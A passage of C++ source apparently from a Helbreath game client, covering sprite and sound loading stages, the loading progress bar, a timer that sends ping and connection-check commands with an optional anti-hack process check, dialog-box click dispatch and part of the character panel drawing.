			MakeSprite( "NMHelm1", DEF_SPRID_HEAD_M + 15*5, 12, TRUE);
			MakeSprite( "NMHelm2", DEF_SPRID_HEAD_M + 15*6, 12, TRUE);
			MakeSprite( "NMHelm3", DEF_SPRID_HEAD_M + 15*7, 12, TRUE);
			MakeSprite( "NMHelm4", DEF_SPRID_HEAD_M + 15*8, 12, TRUE);
			m_cLoading = 76;
		}
		break;
	case 76:
		{	m_hPakFile = CreateFile("sprites\\Wpt.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE ) {
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_UNDIES_W + i + 15*0] = new class CSprite(m_hPakFile, &m_DDraw, "Wpt", i, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_UNDIES_W + i + 15*1] = new class CSprite(m_hPakFile, &m_DDraw, "Wpt", i + 12, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_UNDIES_W + i + 15*2] = new class CSprite(m_hPakFile, &m_DDraw, "Wpt", i + 12*2, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_UNDIES_W + i + 15*3] = new class CSprite(m_hPakFile, &m_DDraw, "Wpt", i + 12*3, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_UNDIES_W + i + 15*4] = new class CSprite(m_hPakFile, &m_DDraw, "Wpt", i + 12*4, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_UNDIES_W + i + 15*5] = new class CSprite(m_hPakFile, &m_DDraw, "Wpt", i + 12*5, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_UNDIES_W + i + 15*6] = new class CSprite(m_hPakFile, &m_DDraw, "Wpt", i + 12*6, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_UNDIES_W + i + 15*7] = new class CSprite(m_hPakFile, &m_DDraw, "Wpt", i + 12*7, TRUE);
				CloseHandle(m_hPakFile);
			}

			m_hPakFile = CreateFile("sprites\\Whr.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE ) {
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_HAIR_W + i + 15*0] = new class CSprite(m_hPakFile, &m_DDraw, "Whr", i + 0, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_HAIR_W + i + 15*1] = new class CSprite(m_hPakFile, &m_DDraw, "Whr", i + 12, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_HAIR_W + i + 15*2] = new class CSprite(m_hPakFile, &m_DDraw, "Whr", i + 12*2, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_HAIR_W + i + 15*3] = new class CSprite(m_hPakFile, &m_DDraw, "Whr", i + 12*3, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_HAIR_W + i + 15*4] = new class CSprite(m_hPakFile, &m_DDraw, "Whr", i + 12*4, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_HAIR_W + i + 15*5] = new class CSprite(m_hPakFile, &m_DDraw, "Whr", i + 12*5, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_HAIR_W + i + 15*6] = new class CSprite(m_hPakFile, &m_DDraw, "Whr", i + 12*6, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_HAIR_W + i + 15*7] = new class CSprite(m_hPakFile, &m_DDraw, "Whr", i + 12*7, TRUE);
				CloseHandle(m_hPakFile);
			}
			m_cLoading = 80;
		}
		break;
	case 80:
		{
			MakeSprite( "WBodice1", DEF_SPRID_BODYARMOR_W + 15*1, 12, TRUE);
			MakeSprite( "WBodice2", DEF_SPRID_BODYARMOR_W + 15*2, 12, TRUE);
			MakeSprite( "WLArmor",	DEF_SPRID_BODYARMOR_W + 15*3, 12, TRUE);
			MakeSprite( "WCMail",	DEF_SPRID_BODYARMOR_W + 15*4, 12, TRUE);
			MakeSprite( "WSMail",	DEF_SPRID_BODYARMOR_W + 15*5, 12, TRUE);
			MakeSprite( "WPMail",	DEF_SPRID_BODYARMOR_W + 15*6, 12, TRUE);
			MakeSprite( "WRobe1",	DEF_SPRID_BODYARMOR_W + 15*7, 12, TRUE);
			MakeSprite( "WSanta",	DEF_SPRID_BODYARMOR_W + 15*8, 12, TRUE);
			MakeSprite( "WHRobe1",	DEF_SPRID_BODYARMOR_W + 15*11, 12, TRUE); // hero
			MakeSprite( "WHRobe2",	DEF_SPRID_BODYARMOR_W + 15*12, 12, TRUE); // hero
			MakeSprite( "WHPMail1",	DEF_SPRID_BODYARMOR_W + 15*9, 12, TRUE); //hero
			MakeSprite( "WHPMail2",	DEF_SPRID_BODYARMOR_W + 15*10, 12, TRUE); //hero
			MakeSprite( "WChemiss",  DEF_SPRID_BERK_W + 15*1, 12, TRUE);
			MakeSprite( "WShirt",	 DEF_SPRID_BERK_W + 15*2, 12, TRUE);
			MakeSprite( "WHauberk",	 DEF_SPRID_BERK_W + 15*3, 12, TRUE);
			MakeSprite( "WHHauberk1",DEF_SPRID_BERK_W + 15*4, 12, TRUE);
			MakeSprite( "WHHauberk2",DEF_SPRID_BERK_W + 15*5, 12, TRUE);
			MakeSprite( "WSkirt",		DEF_SPRID_LEGG_W + 15*1, 12, TRUE);
			MakeSprite( "WTrouser",		DEF_SPRID_LEGG_W + 15*2, 12, TRUE);
			MakeSprite( "WHTrouser",	DEF_SPRID_LEGG_W + 15*3, 12, TRUE);
			MakeSprite( "WHLeggings1",	DEF_SPRID_LEGG_W + 15*6, 12, TRUE);
			MakeSprite( "WHLeggings2",	DEF_SPRID_LEGG_W + 15*7, 12, TRUE);
			MakeSprite( "WCHoses",		DEF_SPRID_LEGG_W + 15*4, 12, TRUE);
			MakeSprite( "WLeggings",	DEF_SPRID_LEGG_W + 15*5, 12, TRUE);
			MakeSprite( "WShoes",	DEF_SPRID_BOOT_W + 15*1, 12, TRUE);
			MakeSprite( "WLBoots",  DEF_SPRID_BOOT_W + 15*2, 12, TRUE);
			m_cLoading = 84;
		}
		break;
	case 84:
		{	m_hPakFile = CreateFile("sprites\\Wsw.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE ) {
				for (i = 0; i < 56; i++) m_pSprite[DEF_SPRID_WEAPON_W + i + 64*1] = new class CSprite(m_hPakFile, &m_DDraw, "Wsw", i + 56*0, TRUE);
				for (i = 0; i < 56; i++) m_pSprite[DEF_SPRID_WEAPON_W + i + 64*2] = new class CSprite(m_hPakFile, &m_DDraw, "Wsw", i + 56*1, TRUE);
				for (i = 0; i < 56; i++) m_pSprite[DEF_SPRID_WEAPON_W + i + 64*3] = new class CSprite(m_hPakFile, &m_DDraw, "Wsw", i + 56*2, TRUE);
				for (i = 0; i < 56; i++) m_pSprite[DEF_SPRID_WEAPON_W + i + 64*4] = new class CSprite(m_hPakFile, &m_DDraw, "Wsw", i + 56*3, TRUE);
				for (i = 0; i < 56; i++) m_pSprite[DEF_SPRID_WEAPON_W + i + 64*6] = new class CSprite(m_hPakFile, &m_DDraw, "Wsw", i + 56*5, TRUE);
				for (i = 0; i < 56; i++) m_pSprite[DEF_SPRID_WEAPON_W + i + 64*7] = new class CSprite(m_hPakFile, &m_DDraw,  "Wsw", i + 56*6, TRUE);
				for (i = 0; i < 56; i++) m_pSprite[DEF_SPRID_WEAPON_W + i + 64*8] = new class CSprite(m_hPakFile, &m_DDraw,  "Wsw", i + 56*7, TRUE);
				for (i = 0; i < 56; i++) m_pSprite[DEF_SPRID_WEAPON_W + i + 64*9] = new class CSprite(m_hPakFile, &m_DDraw,  "Wsw", i + 56*8, TRUE);
				for (i = 0; i < 56; i++) m_pSprite[DEF_SPRID_WEAPON_W + i + 64*10] = new class CSprite(m_hPakFile, &m_DDraw, "Wsw", i + 56*9, TRUE);
				for (i = 0; i < 56; i++) m_pSprite[DEF_SPRID_WEAPON_W + i + 64*11] = new class CSprite(m_hPakFile, &m_DDraw, "Wsw", i + 56*10, TRUE);
				for (i = 0; i < 56; i++) m_pSprite[DEF_SPRID_WEAPON_W + i + 64*12] = new class CSprite(m_hPakFile, &m_DDraw, "Wsw", i + 56*11, TRUE);
				CloseHandle(m_hPakFile);
			}
			MakeSprite( "Wswx",			DEF_SPRID_WEAPON_W + 64*5, 56, TRUE);
			MakeSprite( "Wsw2",			DEF_SPRID_WEAPON_W + 64*13, 56, TRUE);
            MakeSprite( "Wsw3",			DEF_SPRID_WEAPON_W + 64*14, 56, TRUE); // TheVampire
			MakeSprite( "WStormBringer",DEF_SPRID_WEAPON_W + 64*15, 56, TRUE);
			MakeSprite( "WDarkExec",	DEF_SPRID_WEAPON_W + 64*16, 56, TRUE);
			MakeSprite( "WKlonessBlade",DEF_SPRID_WEAPON_W + 64*17, 56, TRUE);
			MakeSprite( "WKlonessAstock",DEF_SPRID_WEAPON_W + 64*18, 56, TRUE);
			MakeSprite( "WDebastator",	DEF_SPRID_WEAPON_W + 64*19, 56, TRUE);
			m_cLoading = 88;
		}
		break;
	case 88:
		{	MakeSprite( "WAxe1",		DEF_SPRID_WEAPON_W + 64*20, 56, TRUE);// Axe
			MakeSprite( "WAxe2",		DEF_SPRID_WEAPON_W + 64*21, 56, TRUE);
			MakeSprite( "WAxe3",		DEF_SPRID_WEAPON_W + 64*22, 56, TRUE);
			MakeSprite( "WAxe4",		DEF_SPRID_WEAPON_W + 64*23, 56, TRUE);
			MakeSprite( "WAxe5",		DEF_SPRID_WEAPON_W + 64*24, 56, TRUE);
			MakeSprite( "WpickAxe1",	DEF_SPRID_WEAPON_W + 64*25, 56, TRUE);
			MakeSprite( "WAxe6",		DEF_SPRID_WEAPON_W + 64*26, 56, TRUE);
			MakeSprite( "Whoe",			DEF_SPRID_WEAPON_W + 64*27, 56, TRUE);
			MakeSprite( "WKlonessAxe",	DEF_SPRID_WEAPON_W + 64*28, 56, TRUE);
			MakeSprite( "WLightBlade",  DEF_SPRID_WEAPON_W + 64*29, 56, TRUE);
			MakeSprite( "WHammer",		DEF_SPRID_WEAPON_W + 64*30, 56, TRUE);
			MakeSprite( "WBHammer",		DEF_SPRID_WEAPON_W + 64*31, 56, TRUE);
			MakeSprite( "WBabHammer",	DEF_SPRID_WEAPON_W + 64*32, 56, TRUE);
			MakeSprite( "WBShadowSword",DEF_SPRID_WEAPON_W + 64*33, 56, TRUE);
			MakeSprite( "WBerserkWand", DEF_SPRID_WEAPON_W + 64*34, 56, TRUE);
			MakeSprite( "Wstaff1",		DEF_SPRID_WEAPON_W + 64*35, 56, TRUE);// Staff
			MakeSprite( "Wstaff2",		DEF_SPRID_WEAPON_W + 64*36, 56, TRUE);
			MakeSprite( "WStaff3",		DEF_SPRID_WEAPON_W + 64*37, 56, TRUE);
			MakeSprite( "WKlonessWand", DEF_SPRID_WEAPON_W + 64*39, 56, TRUE);
			MakeSprite( "WReMagicWand", DEF_SPRID_WEAPON_W + 64*38, 56, TRUE);
			// bows 40 41 below
			MakeSprite( "WDirectBow",	DEF_SPRID_WEAPON_W + 64*42, 56, TRUE);
			MakeSprite( "WFireBow",		DEF_SPRID_WEAPON_W + 64*43, 56, TRUE);
			m_cLoading = 92;
		}
		break;
	case 92:
		{	MakeSprite( "Wmantle01", DEF_SPRID_MANTLE_W + 15*1, 12, TRUE);
			MakeSprite( "Wmantle02", DEF_SPRID_MANTLE_W + 15*2, 12, TRUE);
			MakeSprite( "Wmantle03", DEF_SPRID_MANTLE_W + 15*3, 12, TRUE);
			MakeSprite( "Wmantle04", DEF_SPRID_MANTLE_W + 15*4, 12, TRUE);
			MakeSprite( "Wmantle05", DEF_SPRID_MANTLE_W + 15*5, 12, TRUE);
			MakeSprite( "Wmantle06", DEF_SPRID_MANTLE_W + 15*6, 12, TRUE);
			MakeSprite( "WHelm1",	 DEF_SPRID_HEAD_W + 15*1, 12, TRUE);
			MakeSprite( "WHelm4",	 DEF_SPRID_HEAD_W + 15*4, 12, TRUE);
			MakeSprite( "WHHelm1",	 DEF_SPRID_HEAD_W + 15*9, 12, TRUE);
			MakeSprite( "WHHelm2",	 DEF_SPRID_HEAD_W + 15*10, 12, TRUE);
			MakeSprite( "WHCap1",	 DEF_SPRID_HEAD_W + 15*11, 12, TRUE);
			MakeSprite( "WHCap2",	 DEF_SPRID_HEAD_W + 15*12, 12, TRUE);
			MakeSprite( "NWHelm1",	 DEF_SPRID_HEAD_W + 15*5, 12, TRUE);
			MakeSprite( "NWHelm2",	 DEF_SPRID_HEAD_W + 15*6, 12, TRUE);
			MakeSprite( "NWHelm3",	 DEF_SPRID_HEAD_W + 15*7, 12, TRUE);
			MakeSprite( "NWHelm4",	 DEF_SPRID_HEAD_W + 15*8, 12, TRUE);
			m_cLoading = 96;
		}
		break;
	case 96:
		{	MakeSprite( "Wbo", DEF_SPRID_WEAPON_W + 64*40, 56, TRUE);// Bow
			m_hPakFile = CreateFile("sprites\\Wbo.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE )
			{	for (i = 0; i < 56; i++) m_pSprite[DEF_SPRID_WEAPON_W + i + 64*41] = new class CSprite(m_hPakFile, &m_DDraw, "Wbo", i + 56*1, TRUE);
				CloseHandle(m_hPakFile);
			}
			m_hPakFile = CreateFile("sprites\\Wsh.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE ) {
				for (i = 0; i < 7; i++) m_pSprite[DEF_SPRID_SHIELD_W + i + 8*1] = new class CSprite(m_hPakFile, &m_DDraw, "Wsh", i + 7*0, TRUE);
				for (i = 0; i < 7; i++) m_pSprite[DEF_SPRID_SHIELD_W + i + 8*2] = new class CSprite(m_hPakFile, &m_DDraw, "Wsh", i + 7*1, TRUE);
				for (i = 0; i < 7; i++) m_pSprite[DEF_SPRID_SHIELD_W + i + 8*3] = new class CSprite(m_hPakFile, &m_DDraw, "Wsh", i + 7*2, TRUE);
				for (i = 0; i < 7; i++) m_pSprite[DEF_SPRID_SHIELD_W + i + 8*4] = new class CSprite(m_hPakFile, &m_DDraw, "Wsh", i + 7*3, TRUE);
				for (i = 0; i < 7; i++)	m_pSprite[DEF_SPRID_SHIELD_W + i + 8*5] = new class CSprite(m_hPakFile, &m_DDraw, "Wsh", i + 7*4, TRUE);
				for (i = 0; i < 7; i++) m_pSprite[DEF_SPRID_SHIELD_W + i + 8*6] = new class CSprite(m_hPakFile, &m_DDraw, "Wsh", i + 7*5, TRUE);
				for (i = 0; i < 7; i++) m_pSprite[DEF_SPRID_SHIELD_W + i + 8*7] = new class CSprite(m_hPakFile, &m_DDraw, "Wsh", i + 7*6, TRUE);
				for (i = 0; i < 7; i++) m_pSprite[DEF_SPRID_SHIELD_W + i + 8*8] = new class CSprite(m_hPakFile, &m_DDraw, "Wsh", i + 7*7, TRUE);
				for (i = 0; i < 7; i++) m_pSprite[DEF_SPRID_SHIELD_W + i + 8*9] = new class CSprite(m_hPakFile, &m_DDraw, "Wsh", i + 7*8, TRUE);
				CloseHandle(m_hPakFile);
			}
			m_cLoading = 100;
		}
		break;
	case 100:
		{	MakeEffectSpr( "effect", 0, 10, FALSE);
			MakeEffectSpr( "effect2", 10, 3, FALSE);
			MakeEffectSpr( "effect3", 13, 6, FALSE);
			MakeEffectSpr( "effect4", 19, 5, FALSE);
			m_hPakFile = CreateFile("sprites\\effect5.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE )
			{	for (i = 0; i <= 6; i++) // Because effectn0 is EnergySphere
					m_pEffectSpr[i+ 24] = new class CSprite(m_hPakFile, &m_DDraw, "effect5", i+1, FALSE);
				CloseHandle(m_hPakFile);
			}
			MakeEffectSpr( "CruEffect1", 31, 9, FALSE);
			MakeEffectSpr( "effect6", 40, 5, FALSE);
			MakeEffectSpr( "effect7", 45, 12, FALSE);
			MakeEffectSpr( "effect8", 57, 9, FALSE);
			MakeEffectSpr( "effect9", 66, 21, FALSE);

			MakeEffectSpr( "effect10",  87,  2, FALSE); // Effets Hero items
			MakeEffectSpr( "effect11",  89, 14, FALSE); // Cancel, stormBlade, resu, GateHeldenian....etc
			//NB: Charge 15 du client 3.51, mais il n'y a que 14 ds le PAK
			MakeEffectSpr( "effect11s", 104, 1, FALSE); // effet sort mais je ne sais pas lequel
			MakeEffectSpr("effects", 105, 1, FALSE); // skull effect for wanted system
			// Manque des effets ici .....
			MakeEffectSpr( "yseffect2", 140, 8, FALSE); // Abaddon's death
			MakeEffectSpr( "effect12",  148, 4, FALSE); // Slates auras
			MakeEffectSpr( "yseffect3", 152,16, FALSE); // Fumerolles ou ame qui s'envole
			MakeEffectSpr( "yseffect4", 133, 7, FALSE); // Abaddon's map thunder.


			if (m_bSoundFlag) // Attention il y a un autre systeme de chargement ds la v351
			{	for (i = 1; i <= 24; i++)
				{	wsprintf(G_cTxt, "sounds\\C%d.wav", i);
					m_pCSound[i] = new class CSoundBuffer(m_DSound.m_lpDS, m_DSound.m_DSCaps, G_cTxt);
				}

				for (i = 1; i <= 156; i++)
				{	wsprintf(G_cTxt, "sounds\\M%d.wav", i);
					m_pMSound[i] = new class CSoundBuffer(m_DSound.m_lpDS, m_DSound.m_DSCaps, G_cTxt);
				}
				for (i = 1; i <= 59; i++) // MORLA 2.3 - Agregado ms sonidos
				{	wsprintf(G_cTxt, "sounds\\E%d.wav", i);
					m_pESound[i] = new class CSoundBuffer(m_DSound.m_lpDS, m_DSound.m_DSCaps, G_cTxt);
			}	}
			ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
		}
		break;
	}
}
/*********************************************************************************************************************
** 	void CGame::UpdateScreen_OnLoading_Progress()																	**
**  description			:: loading becomes progressbar																**
**********************************************************************************************************************/
void CGame::UpdateScreen_OnLoading_Progress()
{
	m_DDraw.ClearBackB4();
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_LOADING, 0,0,0, TRUE);
	DrawVersion(TRUE);

	wsprintf(G_cTxt, "%d%%", m_cLoading);

	PutString_SprFont2(592 + SCREENX+39+10, 442 + SCREENY + 39, G_cTxt, 255, 255, 0);
	m_pSprite[DEF_SPRID_INTERFACE_ND_LOADING]->PutSpriteFastWidth(472 + SCREENX+39,442 + SCREENY+39, 1, (int)m_cLoading, G_dwGlobalTime, false);

	m_DDraw.iFlip();
}

void CGame::OnTimer()
{
	if( m_cGameMode < 0 ) return;
	DWORD dwTime = timeGetTime();

	if (m_cGameMode != DEF_GAMEMODE_ONLOADING) {
#ifdef DEF_ANTI_HACK
		if (((dwTime - m_dwCheckSprTime) > 6150) && ( m_dwCheckSprTime != 0))
		{	m_dwCheckSprTime = dwTime;
			if( m_bIsProgramActive ) ReleaseUnusedSprites();			
			if (m_Misc.CheckProcesses2() == FALSE) // Vicieux, on blocque le CCm d'ou une detection hack par serveur.
			{	if ((m_pGSock != NULL) && (m_pGSock->m_bIsAvailable == TRUE))
				bSendCommand(MSGID_COMMAND_CHECKCONNECTION, DEF_MSGTYPE_CONFIRM, NULL, dwTime, NULL, NULL, NULL);
		}	}
#else
		if ((dwTime - m_dwCheckSprTime) > 8000)
		{	m_dwCheckSprTime = dwTime;
			if( m_bIsProgramActive ) ReleaseUnusedSprites();
			if ((m_pGSock != NULL) && (m_pGSock->m_bIsAvailable == TRUE))
				bSendCommand(MSGID_COMMAND_CHECKCONNECTION, DEF_MSGTYPE_CONFIRM, NULL, NULL, NULL, NULL, NULL);
		}
#endif
	}

	if (m_cGameMode == DEF_GAMEMODE_ONMAINGAME)
	{	if ((dwTime - m_dwCheckConnTime) > 5000)
		{	m_dwCheckConnTime = dwTime;
			if ((m_bIsCrusadeMode) && (m_iCrusadeDuty == NULL)) EnableDialogBox(33, 1, NULL, NULL);
		}

		if ((dwTime - m_dwCheckWhoTime) > 5000)
        {
            m_dwCheckWhoTime = dwTime;
        }

		if ((dwTime - m_dwCheckPingTime) > 5000)
        {
            m_dwCheckPingTime = dwTime;
            bSendCommand(MSGID_REQUEST_PING, NULL, NULL, NULL, NULL, NULL, NULL);
        }

		if ((dwTime - m_dwCheckChatTime) > 2000)
		{	m_dwCheckChatTime = m_dwTime;
			ReleaseTimeoverChatMsg();
			if (m_cCommandCount >= 6)
			{	m_iNetLagCount++;
				if (m_iNetLagCount >= 7)
				{	ChangeGameMode(DEF_GAMEMODE_ONCONNECTIONLOST);
					delete m_pGSock;
					m_pGSock = NULL;
					return;
				}
			}else m_iNetLagCount = NULL;
		}

		if ((G_bIsCalcSocketConnected == FALSE) && ((dwTime - G_dwCalcSocketTime) > 5000))
		{	delete m_pGSock;
			m_pGSock = NULL;
			ChangeGameMode(DEF_GAMEMODE_ONQUIT);
			m_bEscPressed = FALSE;
			PlaySound('E', 14, 5);
			if (m_bSoundFlag) m_pESound[38]->bStop();
			if ((m_bSoundFlag) && (m_bMusicStat == TRUE))
			{	StopBGM();	// Snoopy: mp3 support
				if (m_pBGM != NULL) m_pBGM->bStop();
			}
			return;
		}

		if ((G_pCalcSocket != NULL) && (G_bIsCalcSocketConnected == TRUE)) {
			if ((dwTime - G_dwCalcSocketSendTime) > 1000*5) {
				if (memcmp(G_cCmdLineTokenA_Lowercase, "wisetop", 7) != 0)
				
				{	char cPacket[120];
					int  iSended;
					WORD * wp;
					ZeroMemory(cPacket, sizeof(cPacket));
					cPacket[0] = 0;					// Key
					wp  = (WORD *)(cPacket +1);
					*wp = 5;
					iSended = G_pCalcSocket->iSendMsgBlockingMode(cPacket, 5);
				}
				G_dwCalcSocketSendTime = dwTime;
	}	}	}
}


BOOL CGame::_bCheckDlgBoxClick(short msX, short msY, int cRB)
{int i;
 char         cDlgID;
	m_DInput.m_sZ = 0;
	// Snoopy: 41->61
	for (i = 0; i < 61; i++)
	// Snoopy: 40->60
	if (m_cDialogBoxOrder[60 - i] != NULL) {
	// Snoopy: 40->60
		cDlgID = m_cDialogBoxOrder[60 - i];
		if ((m_stDialogBoxInfo[cDlgID].sX < msX) && ((m_stDialogBoxInfo[cDlgID].sX + m_stDialogBoxInfo[cDlgID].sSizeX) > msX) &&
			(m_stDialogBoxInfo[cDlgID].sY < msY) && ((m_stDialogBoxInfo[cDlgID].sY + m_stDialogBoxInfo[cDlgID].sSizeY) > msY) )
		{	switch (cDlgID) {
			case 1:
				DlgBoxClick_Character(msX, msY);
				break;
			case 2:
				DlgBoxClick_Inventory(msX, msY);
				break;
			case 3:
				DlgBoxClick_Magic(msX, msY);
				break;
			case 4:
				DlgBoxClick_ItemDrop(msX, msY);
				break;
			case 5:
				DlgBoxClick_15AgeMsg(msX, msY);
				break;
			case 6:
				DlgBoxClick_WarningMsg(msX, msY);
				break;
			case 7:
				DlgBoxClick_GuildMenu(msX, msY);
				break;
			case 8:
				DlgBoxClick_GuildOp(msX, msY);
				break;
			case 9:
				break;
			case 11:
				DlgBoxClick_Shop(msX, msY);
				break;
			case 12:
				DlgBoxClick_LevelUpSettings(msX, msY);
				break;
			case 13:
				DlgBoxClick_CityhallMenu(msX, msY);
				break;
			case 14:
				DlgBoxClick_Bank(msX, msY);
				break;
			case 15:
				DlgBoxClick_Skill(msX, msY);
				break;
			case 16:
				DlgBoxClick_MagicShop(msX, msY);
				break;
			case 18:
				DlgBoxClick_Text(msX, msY);
				break;
			case 19:
				DlgBoxClick_SysMenu(msX, msY);
				break;
			case 20:
				DlgBoxClick_NpcActionQuery(msX, msY);
				break;
			case 21:
				DlgBoxClick_NpcTalk(msX, msY);
				break;
			case 23:
				DlgBoxClick_ItemSellorRepair(msX, msY);
				break;
			case 24:
				DlgBoxClick_Fish(msX, msY);
				break;
			case 25:
				DlgBoxClick_ShutDownMsg(msX, msY);
				break;
			case 26:
				DlgBoxClick_SkillDlg(msX, msY);
				break;
			case 27:
				DlgBoxClick_Exchange(msX, msY);
				break;
			case 28:
				DlgBoxClick_Quest(msX, msY);
				break;
			case 30:
				DlgBoxClick_IconPannel(msX, msY, cRB);
				break;
			case 31:
				DlgBoxClick_SellList(msX, msY);
				break;
			case 32:
				DlgBoxClick_Party(msX, msY);
				break;
			case 33:
				DlgBoxClick_CrusadeJob(msX, msY);
				break;
			case 34:
				DlgBoxClick_ItemUpgrade(msX, msY);
     			break;
			case 35:
				DlgBoxClick_Help(msX, msY);
				break;

			case 36:
				DlgBoxClick_Commander(msX, msY);
				break;

			case 37:
				DlgBoxClick_Constructor(msX, msY);
				break;

			case 38:
				DlgBoxClick_Soldier(msX, msY);
				break;

			case 40:
				DlgBoxClick_Slates(msX, msY);
				break;
// Snoopy: Boite de dialogue de confirmation d'change
			case 41:
				DlgBoxClick_ConfirmExchange(msX, msY);
				break;
			case 42:
				DlgBoxClick_ChangeStatsMajestic(msX, msY);
				break;
			case 43:
			   DlgBoxClick_FriendList(msX, msY);
			   break;
			case 50:
				DlgBoxClick_Resurect(msX, msY);
				break;
			case 51:
				DlgBoxClick_CMDHallMenu(msX, msY);
				break;
			case 52://50Cent Repair All
                DlgBoxClick_RepairAll(msX, msY);
                break;
			case 53://50Cent - GMPanel - Teleport
				DlgBoxClick_GMPanel_Teleport(msX, msY);
				break;
			case 54://50Cent - GMPanel - Summon
				DlgBoxClick_GMPanel_Summon(msX, msY);
				break;
			case 56://50Cent - GMPanel
				DlgBoxClick_GMPanel(msX, msY);
				break;
			case 57:
				DlgBoxClick_Shop2(msX, msY); // MORLA 2.4 - Click shop2 paralelo
				break;
			case 58: // Centuu : Guild Warehouse
				DlgBoxClick_GuildBank(msX, msY);
				break;
			case 60: // VAMP - online users list
				DlgBoxClick_OnlineUsers(msX, msY);
				break;
			}

			return TRUE;
		}
	}

	return FALSE;
}

BOOL CGame::_bCheckDlgBoxDoubleClick(short msX, short msY)
{
	int i;
	char cDlgID;
	//Snoopy: 41->61
	for (i = 0; i < 61; i++)
	//Snoopy: 40->60
	if (m_cDialogBoxOrder[60 - i] != NULL) {
	//Snoopy: 40->60
		cDlgID = m_cDialogBoxOrder[60 - i];
		if ((m_stDialogBoxInfo[cDlgID].sX < msX)	&& ((m_stDialogBoxInfo[cDlgID].sX + m_stDialogBoxInfo[cDlgID].sSizeX) > msX) &&
			(m_stDialogBoxInfo[cDlgID].sY < msY)	&& ((m_stDialogBoxInfo[cDlgID].sY + m_stDialogBoxInfo[cDlgID].sSizeY) > msY) ) {
			switch (cDlgID) {
			case 1:
				DlbBoxDoubleClick_Character(msX, msY);
				break;
			case 2:
				DlbBoxDoubleClick_Inventory(msX, msY);
				break;
			case 9:
				DlbBoxDoubleClick_GuideMap(msX, msY);
				break;
			}
			return TRUE;
		}
	}
	return FALSE;
}

void CGame::DrawDialogBox_Character(short msX, short msY)
{
	short sX, sY, sSprH, sFrame;
	int i, iR, iG, iB, iSkirtDraw = 0;
	char cTxt2[120], cEquipPoiStatus[DEF_MAXITEMEQUIPPOS];
	char  cItemColor, cCollison;

	sX = m_stDialogBoxInfo[1].sX;
	sY = m_stDialogBoxInfo[1].sY;
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_TEXT, sX, sY, 0, FALSE, m_bDialogTrans);

	ZeroMemory(G_cTxt, sizeof(G_cTxt));
	strcpy(G_cTxt, m_cPlayerName);
	strcat(G_cTxt, " : ");

	if (m_iPKCount > 0) {
		ZeroMemory(cTxt2, sizeof(cTxt2));
		wsprintf(cTxt2, DRAW_DIALOGBOX_CHARACTER1, m_iPKCount);
		strcat(G_cTxt, cTxt2);
	}

	ZeroMemory(cTxt2, sizeof(cTxt2));
	wsprintf(cTxt2, DRAW_DIALOGBOX_CHARACTER2, m_iContribution);
	strcat(G_cTxt, cTxt2);
	PutAlignedString(sX + 24, sX + 252, sY + 52, G_cTxt, 45, 20, 20);
	ZeroMemory(G_cTxt, sizeof(G_cTxt));

	if (m_bCitizen == FALSE)
	{
		strcpy(G_cTxt, DRAW_DIALOGBOX_CHARACTER7); // "Traveller"
	}
	else
	{
		if (m_bHunter)
		{
			if (m_bAresden)
				strcat(G_cTxt, DEF_MSG_ARECIVIL); //
			else strcat(G_cTxt, DEF_MSG_ELVCIVIL); // "Elvine Civilian"
		}
		else
		{
			if (m_bAresden)
				strcat(G_cTxt, DEF_MSG_ARESOLDIER); //
			else strcat(G_cTxt, DEF_MSG_ELVSOLDIER); //
		}
		if (m_iGuildRank >= 0)
		{
			strcat(G_cTxt, "(");
			strcat(G_cTxt, m_cGuildName);
			if (m_iGuildRank == 0) strcat(G_cTxt, DEF_MSG_GUILDMASTER1);
			else strcat(G_cTxt, DEF_MSG_GUILDSMAN1); // " Guildsman)"
		}
	}

	PutAlignedString(sX, sX + 275, sY + 69, G_cTxt, 45, 25, 25);

	int iTemp;
	// Level
	// centu - agregado majestic level

	if (m_iMajesticLevel == 0) {
		wsprintf(G_cTxt, "%d", m_iLevel);
	}
	else {
		wsprintf(G_cTxt, "%d (%d)", m_iLevel, m_iMajesticLevel);
	}
	PutAlignedString(sX + 180, sX + 250, sY + 107 - 6, G_cTxt, 45, 25, 25);

	// Exp
	// centu - mostrar valor con coma

	DisplayCommaNumber_G_cTxt(m_iExp);
	PutAlignedString(sX + 180, sX + 250, sY + 120 - 6, G_cTxt, 45, 25, 25);

	// Next.Exp
	// centu - agregado majestic level
	if (m_iMajesticLevel == 0) {
		DisplayCommaNumber_G_cTxt(iGetLevelExp(m_iLevel + 1));
	}
	else {
		DisplayCommaNumber_G_cTxt(iGetLevelExp(m_iLevel + m_iMajesticLevel + 1));
	}
